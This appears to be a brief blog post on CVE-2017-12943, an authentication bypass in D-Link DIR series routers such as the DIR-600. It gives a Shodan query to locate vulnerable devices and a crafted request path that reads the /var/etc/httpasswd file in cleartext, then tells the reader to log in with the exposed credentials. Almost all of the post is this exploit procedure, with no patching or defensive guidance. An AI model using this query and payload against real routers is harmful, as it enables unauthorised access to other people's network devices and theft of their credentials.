CVE-2017-12943 D-Link DIR Series Authentication Bypass

 Introduction

Login to vulnerable DIR series routers (eg. DIR-600) by viewing cleartext credentials.

Device Identification

Identify vulnerable devices from the result of following Shodan query.

http.favicon.hash:1037387972 Mathopd/1.5p6

Shodan query

View Credentials

View the content of /var/etc/httpasswd file by appending following to router web login page URL.

/model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd


Credentials


Login to the router using the credentials displayed on the left side of page.

Video






Comments

Popular posts from this blog

Extract / Create Cramfs File System from Ubuntu 20.04

Dump memory to file from U-Boot console using Memory Display (md) log

Firmadyne Installation & Emulation of Firmware